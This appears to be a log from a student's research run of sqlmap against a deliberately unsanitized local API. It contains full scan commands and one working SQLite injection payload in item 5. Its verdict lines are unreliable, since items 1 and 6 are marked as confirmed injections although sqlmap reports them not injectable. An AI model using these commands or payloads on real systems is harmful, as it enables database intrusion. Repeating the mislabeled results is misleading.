================================================================================
  SQLMAP - Teste Automatizado de SQL Injection
  Configuração: sem_framework_sem_orm_sem_sanitizacao
  Descrição:    SEM FRAMEWORK | SEM ORM | SEM SANITIZACAO
  Data:         2026-05-31 22:33:37
  Base URL:     http://localhost:8000
  Level: 1 | Risk: 1
  Total de endpoints: 12
  Doc OpenAPI:  C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\docs\ia-generated\sem_framework_sem_orm_sem_sanitizacao.json
================================================================================

--------------------------------------------------------------------------------
[1/12] Testando: usuarios_listar
  Método:    GET
  Path:      /usuarios
  Descrição: Listar todos os usuários
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios"

  [!!!] VULNERABILIDADE ENCONTRADA em usuarios_listar
        -> SQL Injection confirmada

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[)]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:38 /2026-05-31/
  
  [22:33:38] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:38] [INFO] loading tamper module 'space2comment'
  [22:33:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:38] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:33:38] [INFO] flushing session file
  [22:33:38] [INFO] testing connection to the target URL
  [22:33:38] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:38] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:38] [INFO] testing if the target URL content is stable
  [22:33:38] [INFO] target URL content is stable
  [22:33:38] [INFO] testing if URI parameter '#1*' is dynamic
  [22:33:38] [WARNING] URI parameter '#1*' does not appear to be dynamic
  [22:33:38] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
  [22:33:38] [INFO] testing for SQL injection on URI parameter '#1*'
  [22:33:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:33:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:33:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:33:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:33:39] [INFO] testing 'Generic inline queries'
  [22:33:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:33:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:33:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:33:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:33:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:33:39] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:33:39] [WARNING] URI parameter '#1*' does not seem to be injectable
  [22:33:39] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
  [22:33:39] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 73 times
  
  [*] ending @ 22:33:39 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[2/12] Testando: usuarios_criar
  Método:    POST
  Path:      /usuarios
  Descrição: Criar usuário
  Body:      {"nome": "Teste SQLMap", "email": "sqlmap@teste.com", "senha": "senha123"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios" --method=POST --data='{"nome": "Teste SQLMap", "email": "sqlmap@teste.com", "senha": "senha123"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para usuarios_criar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[)]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [,]     | .'| . |
  |___|_  [,]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:39 /2026-05-31/
  
  [22:33:39] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:39] [INFO] loading tamper module 'space2comment'
  [22:33:39] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:40] [INFO] flushing session file
  [22:33:40] [INFO] testing connection to the target URL
  [22:33:40] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
  [22:33:40] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:40] [INFO] testing if the target URL content is stable
  [22:33:40] [INFO] target URL content is stable
  [22:33:40] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:33:40] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 3 times
  
  [*] ending @ 22:33:40 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[3/12] Testando: usuarios_obter
  Método:    GET
  Path:      /usuarios/1
  Descrição: Obter usuário por ID
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/1"

  [?] Resultado inconclusivo para usuarios_obter

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[,]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [.]     | .'| . |
  |___|_  [,]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:41 /2026-05-31/
  
  [22:33:41] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:41] [INFO] loading tamper module 'space2comment'
  [22:33:41] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.16 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:41] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:33:41] [INFO] flushing session file
  [22:33:41] [INFO] testing connection to the target URL
  [22:33:41] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:33:41] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:33:41 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[4/12] Testando: usuarios_atualizar
  Método:    PUT
  Path:      /usuarios/1
  Descrição: Atualizar usuário
  Body:      {"nome": "Teste Atualizado", "email": "update@teste.com", "senha": "nova123"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/1" --method=PUT --data='{"nome": "Teste Atualizado", "email": "update@teste.com", "senha": "nova123"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para usuarios_atualizar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [,]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:42 /2026-05-31/
  
  [22:33:42] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:42] [INFO] loading tamper module 'space2comment'
  [22:33:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:42] [INFO] testing connection to the target URL
  [22:33:42] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:33:42] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:33:42 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[5/12] Testando: usuarios_busca_nome
  Método:    GET
  Path:      /usuarios/busca/
  Descrição: Buscar usuários por nome
  Params:    nome=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/usuarios/busca/?nome=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em usuarios_busca_nome
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[']_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [.]     | .'| . |
  |___|_  ["]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:42 /2026-05-31/
  
  [22:33:42] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:42] [INFO] loading tamper module 'space2comment'
  [22:33:42] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:43] [INFO] testing connection to the target URL
  [22:33:43] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:43] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:43] [INFO] testing if the target URL content is stable
  [22:33:43] [INFO] target URL content is stable
  [22:33:43] [INFO] testing if GET parameter 'nome' is dynamic
  [22:33:43] [WARNING] GET parameter 'nome' does not appear to be dynamic
  [22:33:43] [INFO] heuristic (basic) test shows that GET parameter 'nome' might be injectable (possible DBMS: 'SQLite')
  [22:33:43] [INFO] testing for SQL injection on GET parameter 'nome'
  it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (1) and risk (1) values? [Y/n] Y
  [22:33:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:43] [INFO] testing 'Generic inline queries'
  [22:33:43] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
  [22:33:43] [INFO] GET parameter 'nome' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
  [22:33:43] [INFO] testing 'SQLite inline queries'
  [22:33:43] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
  [22:33:43] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
  [22:33:44] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
  [22:33:44] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
  [22:33:44] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
  [22:33:44] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
  [22:33:44] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
  [22:33:44] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
  [22:33:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  [22:33:44] [INFO] checking if the injection point on GET parameter 'nome' is a false positive
  GET parameter 'nome' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
  ---
  Parameter: nome (GET)
      Type: boolean-based blind
      Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
      Payload: nome=teste' AND CASE WHEN 8214=8214 THEN 8214 ELSE JSON(CHAR(116,82,105,99)) END-- ZUha
  ---
  [22:33:44] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
  [22:33:44] [INFO] the back-end DBMS is SQLite
  back-end DBMS: SQLite
  [22:33:44] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 13 times
  [22:33:44] [INFO] fetched data logged to text files under 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output\localhost'
  
  [*] ending @ 22:33:44 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[6/12] Testando: produtos_listar
  Método:    GET
  Path:      /produtos
  Descrição: Listar todos os produtos
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_listar
        -> SQL Injection confirmada

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . ["]     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:44 /2026-05-31/
  
  [22:33:44] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:44] [INFO] loading tamper module 'space2comment'
  [22:33:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-1)' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:44] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:33:44] [INFO] flushing session file
  [22:33:44] [INFO] testing connection to the target URL
  [22:33:45] [WARNING] turning off pre-connect mechanism because of incompatible server ('BaseHTTP/0.6 Python/3.12.13')
  [22:33:45] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:45] [INFO] testing if the target URL content is stable
  [22:33:45] [INFO] target URL content is stable
  [22:33:45] [INFO] testing if URI parameter '#1*' is dynamic
  [22:33:45] [WARNING] URI parameter '#1*' does not appear to be dynamic
  [22:33:45] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
  [22:33:45] [INFO] testing for SQL injection on URI parameter '#1*'
  [22:33:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  [22:33:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
  [22:33:45] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  [22:33:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  [22:33:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
  [22:33:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  [22:33:45] [INFO] testing 'Generic inline queries'
  [22:33:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
  [22:33:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
  [22:33:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
  [22:33:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
  [22:33:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
  [22:33:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
  [22:33:45] [INFO] testing 'Oracle AND time-based blind'
  it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
  [22:33:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  [22:33:45] [WARNING] URI parameter '#1*' does not seem to be injectable
  [22:33:45] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
  [22:33:45] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 73 times
  
  [*] ending @ 22:33:45 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[7/12] Testando: produtos_criar
  Método:    POST
  Path:      /produtos
  Descrição: Criar produto
  Body:      {"nome": "Produto Teste", "descricao": "Desc teste", "preco": 99.9, "categoria": "Teste"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos" --method=POST --data='{"nome": "Produto Teste", "descricao": "Desc teste", "preco": 99.9, "categoria": "Teste"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para produtos_criar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[)]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [(]     | .'| . |
  |___|_  [,]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:46 /2026-05-31/
  
  [22:33:46] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:46] [INFO] loading tamper module 'space2comment'
  [22:33:46] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:46] [INFO] flushing session file
  [22:33:46] [INFO] testing connection to the target URL
  [22:33:46] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
  [22:33:46] [INFO] checking if the target is protected by some kind of WAF/IPS
  [22:33:46] [INFO] testing if the target URL content is stable
  [22:33:47] [INFO] target URL content is stable
  [22:33:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
  [22:33:47] [WARNING] HTTP error codes detected during run:
  500 (Internal Server Error) - 3 times
  
  [*] ending @ 22:33:47 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[8/12] Testando: produtos_obter
  Método:    GET
  Path:      /produtos/1
  Descrição: Obter produto por ID
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/1"

  [?] Resultado inconclusivo para produtos_obter

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[.]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  [(]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:47 /2026-05-31/
  
  [22:33:47] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:47] [INFO] loading tamper module 'space2comment'
  [22:33:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
  do you want to try URI injections in the target URL itself? [Y/n/q] Y
  [22:33:48] [INFO] flushing session file
  [22:33:48] [INFO] testing connection to the target URL
  [22:33:48] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:33:48] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:33:48 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[9/12] Testando: produtos_atualizar
  Método:    PUT
  Path:      /produtos/1
  Descrição: Atualizar produto
  Body:      {"nome": "Produto Atualizado", "descricao": "Nova desc", "preco": 150.0, "categoria": "Atualizado"}
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/1" --method=PUT --data='{"nome": "Produto Atualizado", "descricao": "Nova desc", "preco": 150.0, "categoria": "Atualizado"}' --headers="Content-Type: application/json"

  [?] Resultado inconclusivo para produtos_atualizar

  --- Saída do sqlmap ---
          ___
         __H__
   ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
  |_ -| . [']     | .'| . |
  |___|_  [)]_|_|_|__,|  _|
        |_|V...       |_|   https://sqlmap.org
  
  [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  
  [*] starting @ 22:33:48 /2026-05-31/
  
  [22:33:48] [WARNING] using 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output' as the output directory
  [22:33:48] [INFO] loading tamper module 'space2comment'
  [22:33:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15' from file 'C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\data\txt\user-agents.txt'
  [22:33:49] [INFO] testing connection to the target URL
  [22:33:49] [CRITICAL] page not found (404)
  it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] Y
  [22:33:49] [WARNING] HTTP error codes detected during run:
  404 (Not Found) - 1 times
  
  [*] ending @ 22:33:49 /2026-05-31/
  
  
  
  --- Fim da saída ---

--------------------------------------------------------------------------------
[10/12] Testando: produtos_busca_nome
  Método:    GET
  Path:      /produtos/busca/
  Descrição: Buscar produtos por nome
  Params:    nome=teste
--------------------------------------------------------------------------------
  CMD: C:\Users\pedro\.rye\py\cpython@3.12.9\python.exe C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\sqlmap.py --batch --level=1 --risk=1 --random-agent --threads=1 --timeout=30 --retries=2 --technique=BEUSTQ --tamper=space2comment --output-dir="C:\Users\pedro\workspaces\faculty\research\tcc\sqlmap-dev\catalogo_sqlmap_logs\sem_framework_sem_orm_sem_sanitizacao\sqlmap_output" --flush-session -u "http://localhost:8000/produtos/busca/?nome=teste"

  [!!!] VULNERABILIDADE ENCONTRADA em produtos_busca_nome
        -> Parâmetro vulnerável detectado
        -> SQL Injection confirmada
        -> DBMS identificado

  --- Saída do sqlmap ---
          ___
         __H__
